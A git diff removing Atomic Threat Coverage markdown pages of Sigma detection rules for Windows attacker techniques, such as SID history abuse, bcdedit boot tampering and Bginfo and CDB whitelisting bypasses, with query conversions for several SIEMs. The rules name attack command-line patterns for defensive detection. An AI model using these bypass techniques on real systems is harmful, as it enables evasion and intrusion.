-| Other Tags           | <ul><li>attack.t1134.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Addition of SID History to Active Directory Object
-id: 2632954e-db1c-49cb-9936-67d1ef1d17d2
-status: stable
-description: An attacker can use the SID history attribute to gain additional privileges.
-references:
-    - https://adsecurity.org/?p=1772
-author: Thomas Patzke, @atc_project (improvements)
-date: 2017/02/19
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1178
-    - attack.t1134.005
-logsource:
-    product: windows
-    service: security
-detection:
-    selection1:
-        EventID:
-            - 4765
-            - 4766
-    selection2:
-        EventID: 4738
-    selection3:
-        SidHistory:
-            - '-'
-            - '%%1793'
-    filter_null:
-        SidHistory:
-    condition: selection1 or (selection2 and not selection3 and not filter_null)
-falsepositives:
-    - Migration of an account into a new domain
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {((($_.ID -eq "4765" -or $_.ID -eq "4766") -or (($_.ID -eq "4738" -and  -not (($_.message -match "-" -or $_.message -match "%%1793"))) -and  -not (-not SidHistory="*")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:("4765" OR "4766") OR (winlog.channel:"Security" AND (winlog.event_id:"4738" AND (NOT (SidHistory:("\-" OR "%%1793")))) AND (NOT (NOT _exists_:SidHistory)))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2632954e-db1c-49cb-9936-67d1ef1d17d2 <<EOF
-{
-  "metadata": {
-    "title": "Addition of SID History to Active Directory Object",
-    "description": "An attacker can use the SID history attribute to gain additional privileges.",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1178",
-      "attack.t1134.005"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:(\"4765\" OR \"4766\") OR (winlog.channel:\"Security\" AND (winlog.event_id:\"4738\" AND (NOT (SidHistory:(\"\\-\" OR \"%%1793\")))) AND (NOT (NOT _exists_:SidHistory)))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:(\"4765\" OR \"4766\") OR (winlog.channel:\"Security\" AND (winlog.event_id:\"4738\" AND (NOT (SidHistory:(\"\\-\" OR \"%%1793\")))) AND (NOT (NOT _exists_:SidHistory)))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Addition of SID History to Active Directory Object'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4765" "4766") OR ((EventID:"4738" AND (NOT (SidHistory:("\-" "%%1793")))) AND (NOT (NOT _exists_:SidHistory))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" ((EventCode="4765" OR EventCode="4766") OR (source="WinEventLog:Security" (EventCode="4738" NOT ((SidHistory="-" OR SidHistory="%%1793"))) NOT (NOT SidHistory="*"))))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id IN ["4765", "4766"] OR (event_source="Microsoft-Windows-Security-Auditing" (event_id="4738"  -(SidHistory IN ["-", "%%1793"]))  -(-SidHistory=*))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*4765|.*4766)|.*(?:.*(?=.*(?:.*(?=.*4738)(?=.*(?!.*(?:.*(?=.*(?:.*-|.*%%1793)))))))(?=.*(?!.*(?:.*(?=.*(?!SidHistory))))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_backup_delete.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_backup_delete.md
deleted file mode 100644
index 5093063..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_backup_delete.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Backup Catalog Deleted       |
-|:-------------------------|:------------------|
-| **Description**          | Detects backup catalog deletions |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1107: File Deletion](https://attack.mitre.org/techniques/T1107)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx](https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx)</li><li>[https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100](https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth (rule), Tom U. @c_APT_ure (collection) |
-| Other Tags           | <ul><li>attack.t1551.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Backup Catalog Deleted
-id: 9703792d-fd9a-456d-a672-ff92efe4806a
-status: experimental
-description: Detects backup catalog deletions
-references:
-    - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx
-    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
-author: Florian Roth (rule), Tom U. @c_APT_ure (collection)
-date: 2017/05/12
-tags:
-    - attack.defense_evasion
-    - attack.t1107
-    - attack.t1551.004
-logsource:
-    product: windows
-    service: application
-detection:
-    selection:
-        EventID: 524
-        Source: Microsoft-Windows-Backup
-    condition: selection
-falsepositives:
-    - Unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Application | where {($_.ID -eq "524" -and $_.message -match "Source.*Microsoft-Windows-Backup") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Application" AND winlog.event_id:"524" AND winlog.event_data.Source:"Microsoft\-Windows\-Backup")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9703792d-fd9a-456d-a672-ff92efe4806a <<EOF
-{
-  "metadata": {
-    "title": "Backup Catalog Deleted",
-    "description": "Detects backup catalog deletions",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1107",
-      "attack.t1551.004"
-    ],
-    "query": "(winlog.channel:\"Application\" AND winlog.event_id:\"524\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-Backup\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Application\" AND winlog.event_id:\"524\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-Backup\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Backup Catalog Deleted'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"524" AND Source:"Microsoft\-Windows\-Backup")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Application" EventCode="524" Source="Microsoft-Windows-Backup")
-```
-
-
-### logpoint
-    
-```
-(event_id="524" Source="Microsoft-Windows-Backup")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*524)(?=.*Microsoft-Windows-Backup))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_bcdedit.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_bcdedit.md
deleted file mode 100644
index a408deb..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_bcdedit.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Possible Ransomware or Unauthorized MBR Modifications       |
-|:-------------------------|:------------------|
-| **Description**          | Detects, possibly, malicious unauthorized usage of bcdedit.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1067: Bootkit](https://attack.mitre.org/techniques/T1067)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set](https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set)</li></ul>  |
-| **Author**               | @neu5ron |
-| Other Tags           | <ul><li>attack.t1542.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible Ransomware or Unauthorized MBR Modifications
-id: c9fbe8e9-119d-40a6-9b59-dd58a5d84429
-status: experimental
-description: Detects, possibly, malicious unauthorized usage of bcdedit.exe
-references:
-    - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set
-author: '@neu5ron'
-date: 2019/02/07
-tags:
-    - attack.defense_evasion
-    - attack.t1070
-    - attack.persistence
-    - attack.t1067
-    - attack.t1551
-    - attack.t1542.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\bcdedit.exe'
-        CommandLine:
-            - '*delete*'
-            - '*deletevalue*'
-            - '*import*'
-    condition: selection
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\bcdedit.exe" -and ($_.message -match "CommandLine.*.*delete.*" -or $_.message -match "CommandLine.*.*deletevalue.*" -or $_.message -match "CommandLine.*.*import.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\bcdedit.exe AND winlog.event_data.CommandLine.keyword:(*delete* OR *deletevalue* OR *import*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c9fbe8e9-119d-40a6-9b59-dd58a5d84429 <<EOF
-{
-  "metadata": {
-    "title": "Possible Ransomware or Unauthorized MBR Modifications",
-    "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1070",
-      "attack.persistence",
-      "attack.t1067",
-      "attack.t1551",
-      "attack.t1542.003"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\bcdedit.exe AND winlog.event_data.CommandLine.keyword:(*delete* OR *deletevalue* OR *import*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\bcdedit.exe AND winlog.event_data.CommandLine.keyword:(*delete* OR *deletevalue* OR *import*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible Ransomware or Unauthorized MBR Modifications'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\bcdedit.exe AND CommandLine.keyword:(*delete* *deletevalue* *import*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\bcdedit.exe" (CommandLine="*delete*" OR CommandLine="*deletevalue*" OR CommandLine="*import*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\bcdedit.exe" CommandLine IN ["*delete*", "*deletevalue*", "*import*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\bcdedit\.exe)(?=.*(?:.*.*delete.*|.*.*deletevalue.*|.*.*import.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_bginfo.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_bginfo.md
deleted file mode 100644
index e2a4366..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_bginfo.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Application Whitelisting Bypass via Bginfo       |
-|:-------------------------|:------------------|
-| **Description**          | Execute VBscript code that is referenced within the *.bgi file. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml)</li><li>[https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/](https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/)</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Application Whitelisting Bypass via Bginfo
-id: aaf46cdc-934e-4284-b329-34aa701e3771
-status: experimental
-description: Execute VBscript code that is referenced within the *.bgi file.
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml
-    - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
-author: Beyu Denis, oscd.community
-date: 2019/10/26
-modified: 2019/11/04
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1218
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-  selection:
-    Image|endswith: '\bginfo.exe'
-    CommandLine|contains|all:
-        - '/popup'
-        - '/nolicprompt'
-  condition: selection
-falsepositives:
-    - Unknown
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\bginfo.exe" -and $_.message -match "CommandLine.*.*/popup.*" -and $_.message -match "CommandLine.*.*/nolicprompt.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\bginfo.exe AND winlog.event_data.CommandLine.keyword:*\/popup* AND winlog.event_data.CommandLine.keyword:*\/nolicprompt*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/aaf46cdc-934e-4284-b329-34aa701e3771 <<EOF
-{
-  "metadata": {
-    "title": "Application Whitelisting Bypass via Bginfo",
-    "description": "Execute VBscript code that is referenced within the *.bgi file.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\bginfo.exe AND winlog.event_data.CommandLine.keyword:*\\/popup* AND winlog.event_data.CommandLine.keyword:*\\/nolicprompt*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\bginfo.exe AND winlog.event_data.CommandLine.keyword:*\\/popup* AND winlog.event_data.CommandLine.keyword:*\\/nolicprompt*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Application Whitelisting Bypass via Bginfo'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\bginfo.exe AND CommandLine.keyword:*\/popup* AND CommandLine.keyword:*\/nolicprompt*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\bginfo.exe" CommandLine="*/popup*" CommandLine="*/nolicprompt*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\bginfo.exe" CommandLine="*/popup*" CommandLine="*/nolicprompt*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\bginfo\.exe)(?=.*.*/popup.*)(?=.*.*/nolicprompt.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_calc.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_calc.md
deleted file mode 100644
index a984689..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_calc.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Suspicious Calculator Usage       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/ItsReallyNick/status/1094080242686312448](https://twitter.com/ItsReallyNick/status/1094080242686312448)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Calculator Usage
-id: 737e618a-a410-49b5-bec3-9e55ff7fbc15
-description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion
-status: experimental
-references:
-    - https://twitter.com/ItsReallyNick/status/1094080242686312448
-author: Florian Roth
-date: 2019/02/09
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine: '*\calc.exe *'
-    selection2:
-        Image: '*\calc.exe'
-    filter2:
-        Image: '*\Windows\Sys*'
-    condition: selection1 or ( selection2 and not filter2 )
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "CommandLine.*.*\\calc.exe .*" -or ($_.ID -eq "1" -and $_.message -match "Image.*.*\\calc.exe" -and  -not ($_.message -match "Image.*.*\\Windows\\Sys.*")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*\\calc.exe\ * OR (winlog.event_data.Image.keyword:*\\calc.exe AND (NOT (winlog.event_data.Image.keyword:*\\Windows\\Sys*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/737e618a-a410-49b5-bec3-9e55ff7fbc15 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Calculator Usage",
-    "description": "Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*\\\\calc.exe\\ * OR (winlog.event_data.Image.keyword:*\\\\calc.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Windows\\\\Sys*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*\\\\calc.exe\\ * OR (winlog.event_data.Image.keyword:*\\\\calc.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Windows\\\\Sys*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Calculator Usage'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*\\calc.exe * OR (Image.keyword:*\\calc.exe AND (NOT (Image.keyword:*\\Windows\\Sys*))))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\calc.exe *" OR (Image="*\\calc.exe" NOT (Image="*\\Windows\\Sys*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine="*\\calc.exe *" OR (event_id="1" Image="*\\calc.exe"  -(Image="*\\Windows\\Sys*"))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.*\calc\.exe .*|.*(?:.*(?=.*.*\calc\.exe)(?=.*(?!.*(?:.*(?=.*.*\Windows\Sys.*)))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_cdb.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_cdb.md
deleted file mode 100644
index 1a764c9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_cdb.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner       |
-|:-------------------------|:------------------|
-| **Description**          | Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate use of debugging tools</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml)</li><li>[http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html](http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html)</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner
-id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2
-status: experimental
-description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml
-    - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
-author: Beyu Denis, oscd.community
-date: 2019/10/26
-modified: 2019/11/04
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1218
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\cdb.exe'
-        CommandLine|contains: '-cf'
-    condition: selection
-falsepositives:
-    - Legitimate use of debugging tools
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\cdb.exe" -and $_.message -match "CommandLine.*.*-cf.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\cdb.exe AND winlog.event_data.CommandLine.keyword:*\-cf*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b5c7395f-e501-4a08-94d4-57fe7a9da9d2 <<EOF
-{
-  "metadata": {
-    "title": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner",
-    "description": "Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\cdb.exe AND winlog.event_data.CommandLine.keyword:*\\-cf*)"
-  },
